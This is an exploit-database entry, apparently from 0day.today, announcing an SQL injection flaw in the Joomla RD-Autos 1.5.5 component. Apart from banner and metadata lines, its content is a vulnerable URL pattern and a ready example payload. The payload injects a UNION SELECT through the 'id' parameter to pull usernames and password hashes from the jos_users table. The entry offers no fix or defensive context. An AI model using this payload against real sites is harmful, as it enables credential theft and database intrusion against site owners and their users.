id: 4681
date: 01/15/2009
title: Joomla Component RD-Autos 1.5.5 (id) SQL Injection Vulnerability
author: H!tm@N
cves: 

================================================================
Joomla Component RD-Autos 1.5.5 (id) SQL Injection Vulnerability
================================================================


#############################################################################
#							                    #
#           Joomla Component RDAutos SQL Injection Vulnerability            #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "RDAutos (com_rdautos)"
[~] Version:        "1.5.5 Stable" 
[~] Date:           "29/09/2008"
[~] Author:         "Robert Dam"
[~] Author URL:     "www.rd-media.org"

########################################

[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

########################################


#  0day.today [2023-03-22]  #